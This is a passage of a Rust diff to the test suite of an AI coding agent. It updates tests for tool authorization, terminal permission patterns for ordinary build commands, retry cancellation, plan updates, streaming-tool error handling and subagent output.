bool { + pub(crate) fn was_killed(&self) -> bool { self.killed.load(Ordering::SeqCst) } - fn set_stopped_by_user(&self, stopped: bool) { + pub(crate) fn set_stopped_by_user(&self, stopped: bool) { self.stopped_by_user.store(stopped, Ordering::SeqCst); } - fn signal_exit(&self) { + pub(crate) fn signal_exit(&self) { if let Some(sender) = self.exit_sender.borrow_mut().take() { let _ = sender.send(()); } @@ -159,7 +158,7 @@ impl crate::TerminalHandle for FakeTerminalHandle { struct 
FakeSubagentHandle { session_id: acp::SessionId, - wait_for_summary_task: Shared>, + send_task: Shared>, } impl SubagentHandle for FakeSubagentHandle { @@ -167,25 +166,34 @@ impl SubagentHandle for FakeSubagentHandle { self.session_id.clone() } + fn num_entries(&self, _cx: &App) -> usize { + unimplemented!() + } + fn send(&self, _message: String, cx: &AsyncApp) -> Task> { - let task = self.wait_for_summary_task.clone(); + let task = self.send_task.clone(); cx.background_spawn(async move { Ok(task.await) }) } } #[derive(Default)] -struct FakeThreadEnvironment { +pub(crate) struct FakeThreadEnvironment { terminal_handle: Option>, subagent_handle: Option>, + terminal_creations: Arc, } impl FakeThreadEnvironment { - pub fn with_terminal(self, terminal_handle: FakeTerminalHandle) -> Self { + pub(crate) fn with_terminal(self, terminal_handle: FakeTerminalHandle) -> Self { Self { terminal_handle: Some(terminal_handle.into()), ..self } } + + pub(crate) fn terminal_creation_count(&self) -> usize { + self.terminal_creations.load(Ordering::SeqCst) + } } impl crate::ThreadEnvironment for FakeThreadEnvironment { @@ -196,6 +204,7 @@ impl crate::ThreadEnvironment for FakeThreadEnvironment { _output_byte_limit: Option, _cx: &mut AsyncApp, ) -> Task>> { + self.terminal_creations.fetch_add(1, Ordering::SeqCst); let handle = self .terminal_handle .clone() @@ -273,8 +282,17 @@ async fn test_echo(cx: &mut TestAppContext) { let events = events.collect().await; thread.update(cx, |thread, _cx| { - assert_eq!(thread.last_message().unwrap().role(), Role::Assistant); - assert_eq!(thread.last_message().unwrap().to_markdown(), "Hello\n") + assert_eq!( + thread.last_received_or_pending_message().unwrap().role(), + Role::Assistant + ); + assert_eq!( + thread + .last_received_or_pending_message() + .unwrap() + .to_markdown(), + "Hello\n" + ) }); assert_eq!(stop_events(events), vec![acp::StopReason::EndTurn]); } @@ -426,9 +444,15 @@ async fn test_thinking(cx: &mut TestAppContext) { let events = 
events.collect().await; thread.update(cx, |thread, _cx| { - assert_eq!(thread.last_message().unwrap().role(), Role::Assistant); assert_eq!( - thread.last_message().unwrap().to_markdown(), + thread.last_received_or_pending_message().unwrap().role(), + Role::Assistant + ); + assert_eq!( + thread + .last_received_or_pending_message() + .unwrap() + .to_markdown(), indoc! {" Think Hello @@ -706,7 +730,7 @@ async fn test_basic_tool_calls(cx: &mut TestAppContext) { thread.update(cx, |thread, _cx| { assert!( thread - .last_message() + .last_received_or_pending_message() .unwrap() .as_agent_message() .unwrap() @@ -743,7 +767,7 @@ async fn test_streaming_tool_calls(cx: &mut TestAppContext) { if let Ok(ThreadEvent::ToolCall(tool_call)) = event { thread.update(cx, |thread, _cx| { // Look for a tool use in the thread's last message - let message = thread.last_message().unwrap(); + let message = thread.last_received_or_pending_message().unwrap(); let agent_message = message.as_agent_message().unwrap(); let last_content = agent_message.content.last().unwrap(); if let AgentMessageContent::ToolUse(last_tool_use) = last_content { @@ -816,14 +840,20 @@ async fn test_tool_authorization(cx: &mut TestAppContext) { // Approve the first - send "allow" option_id (UI transforms "once" to "allow") tool_call_auth_1 .response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); cx.run_until_parked(); // Reject the second - send "deny" option_id directly since Deny is now a button tool_call_auth_2 .response - .send(acp::PermissionOptionId::new("deny")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("deny"), + acp::PermissionOptionKind::RejectOnce, + )) .unwrap(); cx.run_until_parked(); @@ -867,8 +897,9 @@ async fn test_tool_authorization(cx: &mut TestAppContext) { let tool_call_auth_3 = 
next_tool_call_authorization(&mut events).await; tool_call_auth_3 .response - .send(acp::PermissionOptionId::new( - "always_allow:tool_requiring_permission", + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("always_allow:tool_requiring_permission"), + acp::PermissionOptionKind::AllowAlways, )) .unwrap(); cx.run_until_parked(); @@ -976,6 +1007,20 @@ async fn expect_tool_call_update_fields( } } +async fn expect_plan(events: &mut UnboundedReceiver>) -> acp::Plan { + let event = events + .next() + .await + .expect("no plan event received") + .unwrap(); + match event { + ThreadEvent::Plan(plan) => plan, + event => { + panic!("Unexpected event {event:?}"); + } + } +} + async fn next_tool_call_authorization( events: &mut UnboundedReceiver>, ) -> ToolCallAuthorization { @@ -1158,32 +1203,88 @@ fn test_permission_option_ids_for_terminal() { panic!("Expected dropdown permission options"); }; - let allow_ids: Vec = choices - .iter() - .map(|choice| choice.allow.option_id.0.to_string()) - .collect(); - let deny_ids: Vec = choices - .iter() - .map(|choice| choice.deny.option_id.0.to_string()) - .collect(); + // Expect 3 choices: always-tool, always-pattern, once + assert_eq!(choices.len(), 3); - assert!(allow_ids.contains(&"always_allow:terminal".to_string())); - assert!(allow_ids.contains(&"allow".to_string())); - assert!( - allow_ids - .iter() - .any(|id| id.starts_with("always_allow_pattern:terminal\n")), - "Missing allow pattern option" + // First two choices both use the tool-level option IDs + assert_eq!( + choices[0].allow.option_id.0.as_ref(), + "always_allow:terminal" ); + assert_eq!(choices[0].deny.option_id.0.as_ref(), "always_deny:terminal"); + assert!(choices[0].sub_patterns.is_empty()); - assert!(deny_ids.contains(&"always_deny:terminal".to_string())); - assert!(deny_ids.contains(&"deny".to_string())); - assert!( - deny_ids - .iter() - .any(|id| id.starts_with("always_deny_pattern:terminal\n")), - "Missing deny pattern option" + 
assert_eq!( + choices[1].allow.option_id.0.as_ref(), + "always_allow:terminal" ); + assert_eq!(choices[1].deny.option_id.0.as_ref(), "always_deny:terminal"); + assert_eq!(choices[1].sub_patterns, vec!["^cargo\\s+build(\\s|$)"]); + + // Third choice is the one-time allow/deny + assert_eq!(choices[2].allow.option_id.0.as_ref(), "allow"); + assert_eq!(choices[2].deny.option_id.0.as_ref(), "deny"); + assert!(choices[2].sub_patterns.is_empty()); +} + +#[test] +fn test_permission_options_terminal_pipeline_produces_dropdown_with_patterns() { + let permission_options = ToolPermissionContext::new( + TerminalTool::NAME, + vec!["cargo test 2>&1 | tail".to_string()], + ) + .build_permission_options(); + + let PermissionOptions::DropdownWithPatterns { + choices, + patterns, + tool_name, + } = permission_options + else { + panic!("Expected DropdownWithPatterns permission options for pipeline command"); + }; + + assert_eq!(tool_name, TerminalTool::NAME); + + // Should have "Always for terminal" and "Only this time" choices + assert_eq!(choices.len(), 2); + let labels: Vec<&str> = choices + .iter() + .map(|choice| choice.allow.name.as_ref()) + .collect(); + assert!(labels.contains(&"Always for terminal")); + assert!(labels.contains(&"Only this time")); + + // Should have per-command patterns for "cargo test" and "tail" + assert_eq!(patterns.len(), 2); + let pattern_names: Vec<&str> = patterns.iter().map(|cp| cp.display_name.as_str()).collect(); + assert!(pattern_names.contains(&"cargo test")); + assert!(pattern_names.contains(&"tail")); + + // Verify patterns are valid regex patterns + let regex_patterns: Vec<&str> = patterns.iter().map(|cp| cp.pattern.as_str()).collect(); + assert!(regex_patterns.contains(&"^cargo\\s+test(\\s|$)")); + assert!(regex_patterns.contains(&"^tail\\b")); +} + +#[test] +fn test_permission_options_terminal_pipeline_with_chaining() { + let permission_options = ToolPermissionContext::new( + TerminalTool::NAME, + vec!["npm install && npm test | 
tail".to_string()], + ) + .build_permission_options(); + + let PermissionOptions::DropdownWithPatterns { patterns, .. } = permission_options else { + panic!("Expected DropdownWithPatterns for chained pipeline command"); + }; + + // With subcommand-aware patterns, "npm install" and "npm test" are distinct + assert_eq!(patterns.len(), 3); + let pattern_names: Vec<&str> = patterns.iter().map(|cp| cp.display_name.as_str()).collect(); + assert!(pattern_names.contains(&"npm install")); + assert!(pattern_names.contains(&"npm test")); + assert!(pattern_names.contains(&"tail")); } #[gpui::test] @@ -1213,7 +1314,7 @@ async fn test_concurrent_tool_calls(cx: &mut TestAppContext) { assert_eq!(stop_reasons, vec![acp::StopReason::EndTurn]); thread.update(cx, |thread, _cx| { - let last_message = thread.last_message().unwrap(); + let last_message = thread.last_received_or_pending_message().unwrap(); let agent_message = last_message.as_agent_message().unwrap(); let text = agent_message .content @@ -1919,7 +2020,7 @@ async fn test_cancellation(cx: &mut TestAppContext) { .collect::>() .await; thread.update(cx, |thread, _cx| { - let message = thread.last_message().unwrap(); + let message = thread.last_received_or_pending_message().unwrap(); let agent_message = message.as_agent_message().unwrap(); assert_eq!( agent_message.content, @@ -1988,7 +2089,7 @@ async fn test_terminal_tool_cancellation_captures_output(cx: &mut TestAppContext // Verify the tool result contains the terminal output, not just "Tool canceled by user" thread.update(cx, |thread, _cx| { - let message = thread.last_message().unwrap(); + let message = thread.last_received_or_pending_message().unwrap(); let agent_message = message.as_agent_message().unwrap(); let tool_use = agent_message @@ -2144,7 +2245,7 @@ async fn verify_thread_recovery( let events = events.collect::>().await; thread.update(cx, |thread, _cx| { - let message = thread.last_message().unwrap(); + let message = 
thread.last_received_or_pending_message().unwrap(); let agent_message = message.as_agent_message().unwrap(); assert_eq!( agent_message.content, @@ -2453,7 +2554,7 @@ async fn test_terminal_tool_stopped_via_terminal_card_button(cx: &mut TestAppCon // Verify the tool result indicates user stopped thread.update(cx, |thread, _cx| { - let message = thread.last_message().unwrap(); + let message = thread.last_received_or_pending_message().unwrap(); let agent_message = message.as_agent_message().unwrap(); let tool_use = agent_message @@ -2548,7 +2649,7 @@ async fn test_terminal_tool_timeout_expires(cx: &mut TestAppContext) { // Verify the tool result indicates timeout, not user stopped thread.update(cx, |thread, _cx| { - let message = thread.last_message().unwrap(); + let message = thread.last_received_or_pending_message().unwrap(); let agent_message = message.as_agent_message().unwrap(); let tool_use = agent_message @@ -2612,6 +2713,84 @@ async fn test_in_progress_send_canceled_by_next_send(cx: &mut TestAppContext) { assert_eq!(stop_events(events_2), vec![acp::StopReason::EndTurn]); } +#[gpui::test] +async fn test_retry_cancelled_promptly_on_new_send(cx: &mut TestAppContext) { + // Regression test: when a completion fails with a retryable error (e.g. upstream 500), + // the retry loop waits on a timer. If the user switches models and sends a new message + // during that delay, the old turn should exit immediately instead of retrying with the + // stale model. + let ThreadTest { model, thread, .. } = setup(cx, TestModel::Fake).await; + let model_a = model.as_fake(); + + // Start a turn with model_a. + let events_1 = thread + .update(cx, |thread, cx| { + thread.send(UserMessageId::new(), ["Hello"], cx) + }) + .unwrap(); + cx.run_until_parked(); + assert_eq!(model_a.completion_count(), 1); + + // Model returns a retryable upstream 500. The turn enters the retry delay. 
+ model_a.send_last_completion_stream_error( + LanguageModelCompletionError::UpstreamProviderError { + message: "Internal server error".to_string(), + status: http_client::StatusCode::INTERNAL_SERVER_ERROR, + retry_after: None, + }, + ); + model_a.end_last_completion_stream(); + cx.run_until_parked(); + + // The old completion was consumed; model_a has no pending requests yet because the + // retry timer hasn't fired. + assert_eq!(model_a.completion_count(), 0); + + // Switch to model_b and send a new message. This cancels the old turn. + let model_b = Arc::new(FakeLanguageModel::with_id_and_thinking( + "fake", "model-b", "Model B", false, + )); + thread.update(cx, |thread, cx| { + thread.set_model(model_b.clone(), cx); + }); + let events_2 = thread + .update(cx, |thread, cx| { + thread.send(UserMessageId::new(), ["Continue"], cx) + }) + .unwrap(); + cx.run_until_parked(); + + // model_b should have received its completion request. + assert_eq!(model_b.as_fake().completion_count(), 1); + + // Advance the clock well past the retry delay (BASE_RETRY_DELAY = 5s). + cx.executor().advance_clock(Duration::from_secs(10)); + cx.run_until_parked(); + + // model_a must NOT have received another completion request — the cancelled turn + // should have exited during the retry delay rather than retrying with the old model. + assert_eq!( + model_a.completion_count(), + 0, + "old model should not receive a retry request after cancellation" + ); + + // Complete model_b's turn. 
+ model_b + .as_fake() + .send_last_completion_stream_text_chunk("Done!"); + model_b + .as_fake() + .send_last_completion_stream_event(LanguageModelCompletionEvent::Stop(StopReason::EndTurn)); + model_b.as_fake().end_last_completion_stream(); + + let events_1 = events_1.collect::>().await; + assert_eq!(stop_events(events_1), vec![acp::StopReason::Cancelled]); + + let events_2 = events_2.collect::>().await; + assert_eq!(stop_events(events_2), vec![acp::StopReason::EndTurn]); +} + #[gpui::test] async fn test_subsequent_successful_sends_dont_cancel(cx: &mut TestAppContext) { let ThreadTest { model, thread, .. } = setup(cx, TestModel::Fake).await; @@ -2951,7 +3130,7 @@ async fn test_title_generation(cx: &mut TestAppContext) { fake_model.send_last_completion_stream_text_chunk("Hey!"); fake_model.end_last_completion_stream(); cx.run_until_parked(); - thread.read_with(cx, |thread, _| assert_eq!(thread.title(), "New Thread")); + thread.read_with(cx, |thread, _| assert_eq!(thread.title(), None)); // Ensure the summary model has been invoked to generate a title. summary_model.send_last_completion_stream_text_chunk("Hello "); @@ -2960,7 +3139,9 @@ async fn test_title_generation(cx: &mut TestAppContext) { summary_model.end_last_completion_stream(); send.collect::>().await; cx.run_until_parked(); - thread.read_with(cx, |thread, _| assert_eq!(thread.title(), "Hello world")); + thread.read_with(cx, |thread, _| { + assert_eq!(thread.title(), Some("Hello world".into())) + }); // Send another message, ensuring no title is generated this time. 
let send = thread @@ -2974,7 +3155,9 @@ async fn test_title_generation(cx: &mut TestAppContext) { cx.run_until_parked(); assert_eq!(summary_model.pending_completions(), Vec::new()); send.collect::>().await; - thread.read_with(cx, |thread, _| assert_eq!(thread.title(), "Hello world")); + thread.read_with(cx, |thread, _| { + assert_eq!(thread.title(), Some("Hello world".into())) + }); } #[gpui::test] @@ -3070,7 +3253,8 @@ async fn test_agent_connection(cx: &mut TestAppContext) { let clock = Arc::new(clock::FakeSystemClock::new()); let client = Client::new(clock, http_client, cx); let user_store = cx.new(|cx| UserStore::new(client.clone(), cx)); - language_model::init(client.clone(), cx); + language_model::init(cx); + RefreshLlmTokenListener::register(client.clone(), user_store.clone(), cx); language_models::init(user_store, client.clone(), cx); LanguageModelRegistry::test(cx); }); @@ -3080,20 +3264,12 @@ async fn test_agent_connection(cx: &mut TestAppContext) { let fake_fs = cx.update(|cx| fs::FakeFs::new(cx.background_executor().clone())); fake_fs.insert_tree(path!("/test"), json!({})).await; let project = Project::test(fake_fs.clone(), [Path::new("/test")], cx).await; - let cwd = Path::new("/test"); + let cwd = PathList::new(&[Path::new("/test")]); let thread_store = cx.new(|cx| ThreadStore::new(cx)); // Create agent and connection - let agent = NativeAgent::new( - project.clone(), - thread_store, - templates.clone(), - None, - fake_fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx + .update(|cx| NativeAgent::new(thread_store, templates.clone(), None, fake_fs.clone(), cx)); let connection = NativeAgentConnection(agent.clone()); // Create a thread using new_thread @@ -3267,6 +3443,118 @@ async fn test_tool_updates_to_completion(cx: &mut TestAppContext) { ); } +#[gpui::test] +async fn test_update_plan_tool_updates_thread_events(cx: &mut TestAppContext) { + let ThreadTest { thread, model, .. 
} = setup(cx, TestModel::Fake).await; + thread.update(cx, |thread, _cx| thread.add_tool(UpdatePlanTool)); + let fake_model = model.as_fake(); + + let mut events = thread + .update(cx, |thread, cx| { + thread.send(UserMessageId::new(), ["Make a plan"], cx) + }) + .unwrap(); + cx.run_until_parked(); + + let input = json!({ + "plan": [ + { + "step": "Inspect the code", + "status": "completed", + }, + { + "step": "Implement the tool", + "status": "in_progress" + }, + { + "step": "Run tests", + "status": "pending", + } + ] + }); + fake_model.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse( + LanguageModelToolUse { + id: "plan_1".into(), + name: UpdatePlanTool::NAME.into(), + raw_input: input.to_string(), + input, + is_input_complete: true, + thought_signature: None, + }, + )); + fake_model.end_last_completion_stream(); + cx.run_until_parked(); + + let tool_call = expect_tool_call(&mut events).await; + assert_eq!( + tool_call, + acp::ToolCall::new("plan_1", "Update plan") + .kind(acp::ToolKind::Think) + .raw_input(json!({ + "plan": [ + { + "step": "Inspect the code", + "status": "completed", + }, + { + "step": "Implement the tool", + "status": "in_progress" + }, + { + "step": "Run tests", + "status": "pending", + } + ] + })) + .meta(acp::Meta::from_iter([( + "tool_name".into(), + "update_plan".into() + )])) + ); + + let update = expect_tool_call_update_fields(&mut events).await; + assert_eq!( + update, + acp::ToolCallUpdate::new( + "plan_1", + acp::ToolCallUpdateFields::new().status(acp::ToolCallStatus::InProgress) + ) + ); + + let plan = expect_plan(&mut events).await; + assert_eq!( + plan, + acp::Plan::new(vec![ + acp::PlanEntry::new( + "Inspect the code", + acp::PlanEntryPriority::Medium, + acp::PlanEntryStatus::Completed, + ), + acp::PlanEntry::new( + "Implement the tool", + acp::PlanEntryPriority::Medium, + acp::PlanEntryStatus::InProgress, + ), + acp::PlanEntry::new( + "Run tests", + acp::PlanEntryPriority::Medium, + 
acp::PlanEntryStatus::Pending, + ), + ]) + ); + + let update = expect_tool_call_update_fields(&mut events).await; + assert_eq!( + update, + acp::ToolCallUpdate::new( + "plan_1", + acp::ToolCallUpdateFields::new() + .status(acp::ToolCallStatus::Completed) + .raw_output("Plan updated") + ) + ); +} + #[gpui::test] async fn test_send_no_retry_on_success(cx: &mut TestAppContext) { let ThreadTest { thread, model, .. } = setup(cx, TestModel::Fake).await; @@ -3444,7 +3732,7 @@ async fn test_send_retry_finishes_tool_calls_on_error(cx: &mut TestAppContext) { events.collect::>().await; thread.read_with(cx, |thread, _cx| { assert_eq!( - thread.last_message(), + thread.last_received_or_pending_message(), Some(Message::Agent(AgentMessage { content: vec![AgentMessageContent::Text("Done".into())], tool_results: IndexMap::default(), @@ -3508,76 +3796,298 @@ async fn test_send_max_retries_exceeded(cx: &mut TestAppContext) { )); } -/// Filters out the stop events for asserting against in tests -fn stop_events(result_events: Vec>) -> Vec { - result_events - .into_iter() - .filter_map(|event| match event.unwrap() { - ThreadEvent::Stop(stop_reason) => Some(stop_reason), - _ => None, - }) - .collect() -} - -struct ThreadTest { - model: Arc, - thread: Entity, - project_context: Entity, - context_server_store: Entity, - fs: Arc, -} - -enum TestModel { - Sonnet4, - Fake, -} +#[gpui::test] +async fn test_streaming_tool_completes_when_llm_stream_ends_without_final_input( + cx: &mut TestAppContext, +) { + init_test(cx); + always_allow_tools(cx); -impl TestModel { - fn id(&self) -> LanguageModelId { - match self { - TestModel::Sonnet4 => LanguageModelId("claude-sonnet-4-latest".into()), - TestModel::Fake => unreachable!(), - } - } -} + let ThreadTest { model, thread, .. 
} = setup(cx, TestModel::Fake).await; + let fake_model = model.as_fake(); -async fn setup(cx: &mut TestAppContext, model: TestModel) -> ThreadTest { - cx.executor().allow_parking(); + thread.update(cx, |thread, _cx| { + thread.add_tool(StreamingEchoTool::new()); + }); - let fs = FakeFs::new(cx.background_executor.clone()); - fs.create_dir(paths::settings_file().parent().unwrap()) - .await - .unwrap(); - fs.insert_file( - paths::settings_file(), - json!({ - "agent": { - "default_profile": "test-profile", - "profiles": { - "test-profile": { - "name": "Test Profile", - "tools": { - EchoTool::NAME: true, - DelayTool::NAME: true, - WordListTool::NAME: true, - ToolRequiringPermission::NAME: true, - InfiniteTool::NAME: true, - CancellationAwareTool::NAME: true, - (TerminalTool::NAME): true, - } - } - } - } + let _events = thread + .update(cx, |thread, cx| { + thread.send(UserMessageId::new(), ["Use the streaming_echo tool"], cx) }) - .to_string() - .into_bytes(), - ) - .await; + .unwrap(); + cx.run_until_parked(); - cx.update(|cx| { - settings::init(cx); + // Send a partial tool use (is_input_complete = false), simulating the LLM + // streaming input for a tool. + let tool_use = LanguageModelToolUse { + id: "tool_1".into(), + name: "streaming_echo".into(), + raw_input: r#"{"text": "partial"}"#.into(), + input: json!({"text": "partial"}), + is_input_complete: false, + thought_signature: None, + }; + fake_model + .send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse(tool_use.clone())); + cx.run_until_parked(); - match model { + // Send a stream error WITHOUT ever sending is_input_complete = true. + // Before the fix, this would deadlock: the tool waits for more partials + // (or cancellation), run_turn_internal waits for the tool, and the sender + // keeping the channel open lives inside RunningTurn. 
+ fake_model.send_last_completion_stream_error( + LanguageModelCompletionError::UpstreamProviderError { + message: "Internal server error".to_string(), + status: http_client::StatusCode::INTERNAL_SERVER_ERROR, + retry_after: None, + }, + ); + fake_model.end_last_completion_stream(); + + // Advance past the retry delay so run_turn_internal retries. + cx.executor().advance_clock(Duration::from_secs(5)); + cx.run_until_parked(); + + // The retry request should contain the streaming tool's error result, + // proving the tool terminated and its result was forwarded. + let completion = fake_model + .pending_completions() + .pop() + .expect("No running turn"); + assert_eq!( + completion.messages[1..], + vec![ + LanguageModelRequestMessage { + role: Role::User, + content: vec!["Use the streaming_echo tool".into()], + cache: false, + reasoning_details: None, + }, + LanguageModelRequestMessage { + role: Role::Assistant, + content: vec![language_model::MessageContent::ToolUse(tool_use.clone())], + cache: false, + reasoning_details: None, + }, + LanguageModelRequestMessage { + role: Role::User, + content: vec![language_model::MessageContent::ToolResult( + LanguageModelToolResult { + tool_use_id: tool_use.id.clone(), + tool_name: tool_use.name, + is_error: true, + content: "Failed to receive tool input: tool input was not fully received" + .into(), + output: Some( + "Failed to receive tool input: tool input was not fully received" + .into() + ), + } + )], + cache: true, + reasoning_details: None, + }, + ] + ); + + // Finish the retry round so the turn completes cleanly. 
+ fake_model.send_last_completion_stream_text_chunk("Done"); + fake_model.end_last_completion_stream(); + cx.run_until_parked(); + + thread.read_with(cx, |thread, _cx| { + assert!( + thread.is_turn_complete(), + "Thread should not be stuck; the turn should have completed", + ); + }); +} + +#[gpui::test] +async fn test_streaming_tool_json_parse_error_is_forwarded_to_running_tool( + cx: &mut TestAppContext, +) { + init_test(cx); + always_allow_tools(cx); + + let ThreadTest { model, thread, .. } = setup(cx, TestModel::Fake).await; + let fake_model = model.as_fake(); + + thread.update(cx, |thread, _cx| { + thread.add_tool(StreamingJsonErrorContextTool); + }); + + let _events = thread + .update(cx, |thread, cx| { + thread.send( + UserMessageId::new(), + ["Use the streaming_json_error_context tool"], + cx, + ) + }) + .unwrap(); + cx.run_until_parked(); + + let tool_use = LanguageModelToolUse { + id: "tool_1".into(), + name: StreamingJsonErrorContextTool::NAME.into(), + raw_input: r#"{"text": "partial"#.into(), + input: json!({"text": "partial"}), + is_input_complete: false, + thought_signature: None, + }; + fake_model.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse(tool_use)); + cx.run_until_parked(); + + fake_model.send_last_completion_stream_event( + LanguageModelCompletionEvent::ToolUseJsonParseError { + id: "tool_1".into(), + tool_name: StreamingJsonErrorContextTool::NAME.into(), + raw_input: r#"{"text": "partial"#.into(), + json_parse_error: "EOF while parsing a string at line 1 column 17".into(), + }, + ); + fake_model + .send_last_completion_stream_event(LanguageModelCompletionEvent::Stop(StopReason::ToolUse)); + fake_model.end_last_completion_stream(); + cx.run_until_parked(); + + cx.executor().advance_clock(Duration::from_secs(5)); + cx.run_until_parked(); + + let completion = fake_model + .pending_completions() + .pop() + .expect("No running turn"); + + let tool_results: Vec<_> = completion + .messages + .iter() + .flat_map(|message| 
&message.content) + .filter_map(|content| match content { + MessageContent::ToolResult(result) + if result.tool_use_id == language_model::LanguageModelToolUseId::from("tool_1") => + { + Some(result) + } + _ => None, + }) + .collect(); + + assert_eq!( + tool_results.len(), + 1, + "Expected exactly 1 tool result for tool_1, got {}: {:#?}", + tool_results.len(), + tool_results + ); + + let result = tool_results[0]; + assert!(result.is_error); + let content_text = match &result.content { + language_model::LanguageModelToolResultContent::Text(text) => text.to_string(), + other => panic!("Expected text content, got {:?}", other), + }; + assert!( + content_text.contains("Saw partial text 'partial' before invalid JSON"), + "Expected tool-enriched partial context, got: {content_text}" + ); + assert!( + content_text + .contains("Error parsing input JSON: EOF while parsing a string at line 1 column 17"), + "Expected forwarded JSON parse error, got: {content_text}" + ); + assert!( + !content_text.contains("tool input was not fully received"), + "Should not contain orphaned sender error, got: {content_text}" + ); + + fake_model.send_last_completion_stream_text_chunk("Done"); + fake_model.end_last_completion_stream(); + cx.run_until_parked(); + + thread.read_with(cx, |thread, _cx| { + assert!( + thread.is_turn_complete(), + "Thread should not be stuck; the turn should have completed", + ); + }); +} + +/// Filters out the stop events for asserting against in tests +fn stop_events(result_events: Vec>) -> Vec { + result_events + .into_iter() + .filter_map(|event| match event.unwrap() { + ThreadEvent::Stop(stop_reason) => Some(stop_reason), + _ => None, + }) + .collect() +} + +struct ThreadTest { + model: Arc, + thread: Entity, + project_context: Entity, + context_server_store: Entity, + fs: Arc, +} + +enum TestModel { + Sonnet4, + Fake, +} + +impl TestModel { + fn id(&self) -> LanguageModelId { + match self { + TestModel::Sonnet4 => LanguageModelId("claude-sonnet-4-latest".into()), 
+ TestModel::Fake => unreachable!(), + } + } +} + +async fn setup(cx: &mut TestAppContext, model: TestModel) -> ThreadTest { + cx.executor().allow_parking(); + + let fs = FakeFs::new(cx.background_executor.clone()); + fs.create_dir(paths::settings_file().parent().unwrap()) + .await + .unwrap(); + fs.insert_file( + paths::settings_file(), + json!({ + "agent": { + "default_profile": "test-profile", + "profiles": { + "test-profile": { + "name": "Test Profile", + "tools": { + EchoTool::NAME: true, + DelayTool::NAME: true, + WordListTool::NAME: true, + ToolRequiringPermission::NAME: true, + InfiniteTool::NAME: true, + CancellationAwareTool::NAME: true, + StreamingEchoTool::NAME: true, + StreamingJsonErrorContextTool::NAME: true, + StreamingFailingEchoTool::NAME: true, + TerminalTool::NAME: true, + UpdatePlanTool::NAME: true, + } + } + } + } + }) + .to_string() + .into_bytes(), + ) + .await; + + cx.update(|cx| { + settings::init(cx); + + match model { TestModel::Fake => {} TestModel::Sonnet4 => { gpui_tokio::init(cx); @@ -3585,7 +4095,8 @@ async fn setup(cx: &mut TestAppContext, model: TestModel) -> ThreadTest { cx.set_http_client(Arc::new(http_client)); let client = Client::production(cx); let user_store = cx.new(|cx| UserStore::new(client.clone(), cx)); - language_model::init(client.clone(), cx); + language_model::init(cx); + RefreshLlmTokenListener::register(client.clone(), user_store.clone(), cx); language_models::init(user_store, client.clone(), cx); } }; @@ -4182,23 +4693,16 @@ async fn test_subagent_tool_call_end_to_end(cx: &mut TestAppContext) { .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let 
connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { connection .clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -4268,7 +4772,153 @@ async fn test_subagent_tool_call_end_to_end(cx: &mut TestAppContext) { ## Assistant - subagent task response + subagent task response + + "} + ); + + model.send_last_completion_stream_text_chunk("Response"); + model.end_last_completion_stream(); + + send.await.unwrap(); + + assert_eq!( + acp_thread.read_with(cx, |thread, cx| thread.to_markdown(cx)), + indoc! {r#" + ## User + + Prompt + + ## Assistant + + spawning subagent + + **Tool Call: label** + Status: Completed + + subagent task response + + ## Assistant + + Response + + "#}, + ); +} + +#[gpui::test] +async fn test_subagent_tool_output_does_not_include_thinking(cx: &mut TestAppContext) { + init_test(cx); + cx.update(|cx| { + LanguageModelRegistry::test(cx); + }); + cx.update(|cx| { + cx.update_flags(true, vec!["subagents".to_string()]); + }); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/", + json!({ + "a": { + "b.md": "Lorem" + } + }), + ) + .await; + let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; + let thread_store = cx.new(|cx| ThreadStore::new(cx)); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); + let connection = Rc::new(NativeAgentConnection(agent.clone())); + + let acp_thread = cx + .update(|cx| { + connection + .clone() + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) + }) + .await + .unwrap(); + let session_id = acp_thread.read_with(cx, |thread, _| thread.session_id().clone()); + let thread = agent.read_with(cx, |agent, _| { + agent.sessions.get(&session_id).unwrap().thread.clone() + }); + let model = Arc::new(FakeLanguageModel::default()); + + // Ensure empty threads are not saved, even if 
they get mutated. + thread.update(cx, |thread, cx| { + thread.set_model(model.clone(), cx); + }); + cx.run_until_parked(); + + let send = acp_thread.update(cx, |thread, cx| thread.send_raw("Prompt", cx)); + cx.run_until_parked(); + model.send_last_completion_stream_text_chunk("spawning subagent"); + let subagent_tool_input = SpawnAgentToolInput { + label: "label".to_string(), + message: "subagent task prompt".to_string(), + session_id: None, + }; + let subagent_tool_use = LanguageModelToolUse { + id: "subagent_1".into(), + name: SpawnAgentTool::NAME.into(), + raw_input: serde_json::to_string(&subagent_tool_input).unwrap(), + input: serde_json::to_value(&subagent_tool_input).unwrap(), + is_input_complete: true, + thought_signature: None, + }; + model.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse( + subagent_tool_use, + )); + model.end_last_completion_stream(); + + cx.run_until_parked(); + + let subagent_session_id = thread.read_with(cx, |thread, cx| { + thread + .running_subagent_ids(cx) + .get(0) + .expect("subagent thread should be running") + .clone() + }); + + let subagent_thread = agent.read_with(cx, |agent, _cx| { + agent + .sessions + .get(&subagent_session_id) + .expect("subagent session should exist") + .acp_thread + .clone() + }); + + model.send_last_completion_stream_text_chunk("subagent task response 1"); + 